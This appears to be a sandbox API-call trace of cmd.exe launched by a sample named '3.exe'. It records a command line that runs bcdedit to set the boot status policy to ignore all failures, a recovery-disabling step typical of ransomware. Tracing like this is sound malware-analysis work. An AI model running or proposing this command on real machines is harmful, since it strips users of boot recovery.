	[0033.659] GetConsoleOutputCP () returned 0x1b5
	[0033.659] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.659] SetConsoleCtrlHandler (HandlerRoutine=0x4a3d3184, Add=1) returned 1
	[0033.659] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.659] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0033.660] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.660] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3de194 | out: lpMode=0x4a3de194) returned 1
	[0033.660] _get_osfhandle (_FileHandle=1) returned 0x7
	[0033.660] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0033.660] _get_osfhandle (_FileHandle=0) returned 0x3
	[0033.660] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3de198 | out: lpMode=0x4a3de198) returned 1
	[0033.661] GetEnvironmentStringsW () returned 0x3d8b00*
	[0033.661] GetProcessHeap () returned 0x3c0000
	[0033.661] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xa7c) returned 0x3d9590
	[0033.661] FreeEnvironmentStringsW (penv=0x3d8b00) returned 1
	[0033.661] GetProcessHeap () returned 0x3c0000
	[0033.661] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x8) returned 0x3d8980
	[0033.661] GetEnvironmentStringsW () returned 0x3d8b00*
	[0033.661] GetProcessHeap () returned 0x3c0000
	[0033.661] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xa7c) returned 0x3da020
	[0033.661] FreeEnvironmentStringsW (penv=0x3d8b00) returned 1
	[0033.661] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e738 | out: phkResult=0x24e738*=0x44) returned 0x0
	[0033.661] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x0, lpData=0x24e750*=0x18, lpcbData=0x24e734*=0x1000) returned 0x2
	[0033.661] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x4, lpData=0x24e750*=0x1, lpcbData=0x24e734*=0x4) returned 0x0
	[0033.661] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x0, lpData=0x24e750*=0x1, lpcbData=0x24e734*=0x1000) returned 0x2
	[0033.661] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x4, lpData=0x24e750*=0x0, lpcbData=0x24e734*=0x4) returned 0x0
	[0033.661] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x4, lpData=0x24e750*=0x40, lpcbData=0x24e734*=0x4) returned 0x0
	[0033.661] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x4, lpData=0x24e750*=0x40, lpcbData=0x24e734*=0x4) returned 0x0
	[0033.662] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x0, lpData=0x24e750*=0x40, lpcbData=0x24e734*=0x1000) returned 0x2
	[0033.662] RegCloseKey (hKey=0x44) returned 0x0
	[0033.662] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e738 | out: phkResult=0x24e738*=0x44) returned 0x0
	[0033.662] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x0, lpData=0x24e750*=0x40, lpcbData=0x24e734*=0x1000) returned 0x2
	[0033.662] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x4, lpData=0x24e750*=0x1, lpcbData=0x24e734*=0x4) returned 0x0
	[0033.662] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x0, lpData=0x24e750*=0x1, lpcbData=0x24e734*=0x1000) returned 0x2
	[0033.662] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x4, lpData=0x24e750*=0x0, lpcbData=0x24e734*=0x4) returned 0x0
	[0033.662] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x4, lpData=0x24e750*=0x9, lpcbData=0x24e734*=0x4) returned 0x0
	[0033.662] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x4, lpData=0x24e750*=0x9, lpcbData=0x24e734*=0x4) returned 0x0
	[0033.662] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e730, lpData=0x24e750, lpcbData=0x24e734*=0x1000 | out: lpType=0x24e730*=0x0, lpData=0x24e750*=0x9, lpcbData=0x24e734*=0x1000) returned 0x2
	[0033.662] RegCloseKey (hKey=0x44) returned 0x0
	[0033.662] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc417d1
	[0033.662] srand (_Seed=0x5dc417d1) 
	[0033.662] GetCommandLineW () returned="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures"
	[0033.662] GetCommandLineW () returned="/C bcdedit /set {default} bootstatuspolicy ignoreallfailures"
	[0033.662] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.662] GetProcessHeap () returned 0x3c0000
	[0033.662] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x218) returned 0x3daab0
	[0033.663] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3daac0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0033.663] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.663] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.663] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.663] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0033.663] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0033.663] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0033.663] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0033.663] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0033.663] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0033.663] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0033.663] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0033.663] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0033.663] GetProcessHeap () returned 0x3c0000
	[0033.663] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d9590 | out: hHeap=0x3c0000) returned 1
	[0033.663] GetEnvironmentStringsW () returned 0x3d8b00*
	[0033.663] GetProcessHeap () returned 0x3c0000
	[0033.663] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xa94) returned 0x3dacd0
	[0033.663] FreeEnvironmentStringsW (penv=0x3d8b00) returned 1
	[0033.663] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0033.663] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0033.663] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0033.663] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0033.663] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0033.663] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0033.663] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0033.664] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0033.664] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0033.664] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0033.664] GetProcessHeap () returned 0x3c0000
	[0033.664] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x5c) returned 0x3db770
	[0033.664] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f540 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.664] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x24f540, lpFilePart=0x24f520 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24f520*="Desktop") returned 0x25
	[0033.664] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0033.664] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f250 | out: lpFindFileData=0x24f250*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x3db7e0
	[0033.664] FindClose (in: hFindFile=0x3db7e0 | out: hFindFile=0x3db7e0) returned 1
	[0033.664] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x24f250 | out: lpFindFileData=0x24f250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3db7e0
	[0033.664] FindClose (in: hFindFile=0x3db7e0 | out: hFindFile=0x3db7e0) returned 1
	[0033.664] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20
	[0033.664] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x24f250 | out: lpFindFileData=0x24f250*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb9670240, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xb9670240, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x3db7e0
	[0033.664] FindClose (in: hFindFile=0x3db7e0 | out: hFindFile=0x3db7e0) returned 1
	[0033.665] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11
	[0033.665] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1
	[0033.665] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1
	[0033.665] GetProcessHeap () returned 0x3c0000
	[0033.665] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dacd0 | out: hHeap=0x3c0000) returned 1
	[0033.665] GetEnvironmentStringsW () returned 0x3db7e0*
	[0033.665] GetProcessHeap () returned 0x3c0000
	[0033.665] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xae8) returned 0x3dc2d0
	[0033.665] FreeEnvironmentStringsW (penv=0x3db7e0) returned 1
	[0033.665] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a3ec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25
	[0033.665] GetProcessHeap () returned 0x3c0000
	[0033.665] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3db770 | out: hHeap=0x3c0000) returned 1
	[0033.665] GetProcessHeap () returned 0x3c0000
	[0033.665] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4016) returned 0x3dcdc0
	[0033.665] GetProcessHeap () returned 0x3c0000
	[0033.665] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x88) returned 0x3d95f0
	[0033.665] GetProcessHeap () returned 0x3c0000
	[0033.665] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dcdc0 | out: hHeap=0x3c0000) returned 1
	[0033.666] GetConsoleOutputCP () returned 0x1b5
	[0033.666] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a3ebfe0 | out: lpCPInfo=0x4a3ebfe0) returned 1
	[0033.666] GetUserDefaultLCID () returned 0x409
	[0033.666] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a3e7b50, cchData=8 | out: lpLCData=":") returned 2
	[0033.666] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24f650, cchData=128 | out: lpLCData="0") returned 2
	[0033.666] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24f650, cchData=128 | out: lpLCData="0") returned 2
	[0033.666] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24f650, cchData=128 | out: lpLCData="1") returned 2
	[0033.666] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a3fa740, cchData=8 | out: lpLCData="/") returned 2
	[0033.666] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a3fa4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0033.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a3fa460, cchData=32 | out: lpLCData="Tue") returned 4
	[0033.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a3fa420, cchData=32 | out: lpLCData="Wed") returned 4
	[0033.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a3fa3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0033.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a3fa3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0033.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a3fa360, cchData=32 | out: lpLCData="Sat") returned 4
	[0033.667] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a3fa700, cchData=32 | out: lpLCData="Sun") returned 4
	[0033.667] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a3e7b40, cchData=8 | out: lpLCData=".") returned 2
	[0033.667] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a3fa4e0, cchData=8 | out: lpLCData=",") returned 2
	[0033.667] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0033.668] GetProcessHeap () returned 0x3c0000
	[0033.668] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20c) returned 0x3d96f0
	[0033.668] GetConsoleTitleW (in: lpConsoleTitle=0x3d96f0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.668] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000
	[0033.668] GetProcAddress (hModule=0x76e30000, lpProcName="CopyFileExW") returned 0x76e423d0
	[0033.668] GetProcAddress (hModule=0x76e30000, lpProcName="IsDebuggerPresent") returned 0x76e38290
	[0033.668] GetProcAddress (hModule=0x76e30000, lpProcName="SetConsoleInputExeNameW") returned 0x76e417e0
	[0033.669] GetProcessHeap () returned 0x3c0000
	[0033.669] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4012) returned 0x3dcdc0
	[0033.669] GetProcessHeap () returned 0x3c0000
	[0033.669] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3dcdc0 | out: hHeap=0x3c0000) returned 1
	[0033.669] _wcsicmp (_String1="bcdedit", _String2=")") returned 57
	[0033.669] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4
	[0033.669] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4
	[0033.669] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7
	[0033.669] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7
	[0033.669] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16
	[0033.669] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16
	[0033.669] GetProcessHeap () returned 0x3c0000
	[0033.669] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb0) returned 0x3d9910
	[0033.669] GetProcessHeap () returned 0x3c0000
	[0033.669] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x20) returned 0x3d4630
	[0033.670] GetProcessHeap () returned 0x3c0000
	[0033.670] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x76) returned 0x3d99d0
	[0033.671] GetConsoleTitleW (in: lpConsoleTitle=0x24f560, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe") returned 0x2b
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="START") returned -17
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14
	[0033.672] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="START") returned -17
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9
	[0033.673] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11
	[0033.674] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14
	[0033.674] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14
	[0033.674] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1
	[0033.674] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4
	[0033.674] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15
	[0033.674] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1
	[0033.674] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11
	[0033.674] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4
	[0033.674] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7
	[0033.674] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16
	[0033.674] GetProcessHeap () returned 0x3c0000
	[0033.674] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x218) returned 0x3d9a50
	[0033.674] GetProcessHeap () returned 0x3c0000
	[0033.674] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x86) returned 0x3d9c70
	[0033.674] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1
	[0033.674] GetProcessHeap () returned 0x3c0000
	[0033.674] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x420) returned 0x3c1320
	[0033.674] SetErrorMode (uMode=0x0) returned 0x0
	[0033.675] SetErrorMode (uMode=0x1) returned 0x0
	[0033.675] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3c1330, lpFilePart=0x24edf0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24edf0*="Desktop") returned 0x25
	[0033.675] SetErrorMode (uMode=0x0) returned 0x1
	[0033.675] GetProcessHeap () returned 0x3c0000
	[0033.675] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3c1320, Size=0x6c) returned 0x3c1320
	[0033.675] GetProcessHeap () returned 0x3c0000
	[0033.675] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3c1320) returned 0x6c
	[0033.675] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0033.675] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0033.675] GetProcessHeap () returned 0x3c0000
	[0033.675] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x128) returned 0x3d9d00
	[0033.675] GetProcessHeap () returned 0x3c0000
	[0033.675] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x240) returned 0x3c13a0
	[0033.681] GetProcessHeap () returned 0x3c0000
	[0033.681] RtlReAllocateHeap (Heap=0x3c0000, Flags=0x0, Ptr=0x3c13a0, Size=0x12a) returned 0x3c13a0
	[0033.681] GetProcessHeap () returned 0x3c0000
	[0033.681] RtlSizeHeap (HeapHandle=0x3c0000, Flags=0x0, MemoryPointer=0x3c13a0) returned 0x12a
	[0033.681] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a3df360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0033.681] GetProcessHeap () returned 0x3c0000
